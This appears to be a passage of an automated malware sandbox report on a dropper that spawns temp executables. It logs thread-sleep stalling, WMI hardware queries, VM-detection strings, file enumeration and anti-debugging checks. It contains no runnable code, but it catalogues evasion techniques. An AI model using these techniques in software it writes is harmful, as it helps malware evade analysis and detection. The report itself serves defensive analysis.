Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	API coverage: 1.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -47031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -33082s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -52718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -30302s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -55327s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -38215s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -48172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -54678s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -46407s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -42194s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -59377s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -43252s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -52827s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -56855s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -50306s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -44732s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -55461s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -46456s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -39034s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -59859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -43059s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -35184s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -47540s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -37220s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -31309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -38045s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -57926s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -48925s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -57254s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -43307s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -43560s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600	Thread sleep time: -31476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7696	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 2136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe TID: 4088	Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe TID: 4088	Thread sleep time: -35550s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C8F261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C8F261E

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30302
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56855
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50306
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39034
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43059
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48925
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31476
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp\u5qk.2	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u5qk.3.exe, 00000009.00000003.2494932914.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n },\r\n {\r\n \"Name\": \"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n }\r\n]","OS_Name":"Microsoft Windows 10 Pro","GPUs":"[\r\n {\r\n \"Caption\": \"HF6TYZRRO\",\r\n \"VideoProcessor\": \"MKELR1FK\",\r\n \"VideoArchitecture\": 5,\r\n \"AdapterRAM\": 1073741824,\r\n \"VideoMode\": \"1280 x 1024 x 4294967296 colors\",\r\n \"RefreshRate\": 1\r\n }\r\n]"},"measurements":{"Installed":1}}}}3332","OS_Language":"en-GB","IsActiveCare":"False","InstallType":"Install","Result":"Success","ProductId":"5488cb36-be62-4606-b07b-2ee938868bd1","OS_Version":"10.0.19045","OS_BuildNumber":"19045","EcommId":"11a12794-499e-4fa0-a281-a9a9aa8b2685","Disks":"[\r\n {\r\n \"Caption\": \"VMware Virtual disk\",\r\n \"Size\": 53687091200,\r\n \"MediaType\": 4,\r\n \"BusType\": 10\r\n }\r\n]","CPUs":"[\r\n {\r\n \"Name\": \"Intel(Rh
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: QEMU_HARDU
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk
Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,"R
Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n },\r\n {\r\n \"Name\": \"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n }\r\n]","OS_Name":"Microsoft Windows 10 Pro","GPUs":"[\r\n {\r\n \"Caption\": \"HF6TYZRRO\",\r\n \"VideoProcessor\": \"MKELR1FK\",\r\n \"VideoArchitecture\": 5,\r\n \"AdapterRAM\": 1073741824,\r\n \"VideoMode\": \"1280 x 1024 x 4294967296 colors\",\r\n \"RefreshRate\": 1\r\n }\r\n]"},"measurements":{"Installed":1}}}}3332","OS_Language":"en-GB","IsActiveCare":"False","InstallType":"Install","Result":"Success","ProductId":"5488cb36-be62-4606-b07b-2ee938868bd1","OS_Version":"10.0.19045","OS_BuildNumber":"19045","EcommId":"11a12794-499e-4fa0-a281-a9a9aa8b2685","Disks":"[\r\n {\r\n \"Caption\": \"VMware Virtual disk\",\r\n \"Size\": 53687091200,\r\n \"MediaType\": 4,\r\n \"BusType\": 10\r\n }\r\n]","CPUs":"[\r\n {\r\n \"Name\": \"Intel(R
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 0000000D.00000002.2976557348.0000000000870000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80955
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80776
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80936
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80933
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80947
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-81969
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80954
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	API call chain: ExitProcess graph end node	graph_1-80977
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_00CFD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

3_2_00CFD15B

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04153C4E mov eax, dword ptr fs:[00000030h]	0_2_04153C4E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04140D90 mov eax, dword ptr fs:[00000030h]	0_2_04140D90
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414092B mov eax, dword ptr fs:[00000030h]	0_2_0414092B
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041E54B3 push dword ptr fs:[00000030h]	0_2_041E54B3
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04149CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_04149CDA
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04149E6D SetUnhandledExceptionFilter,	0_2_04149E6D
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0414A125
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041509A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_041509A2
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BA8B1F7
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6BA8B66C
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BC3AC62
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00CFC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00CFC1FD
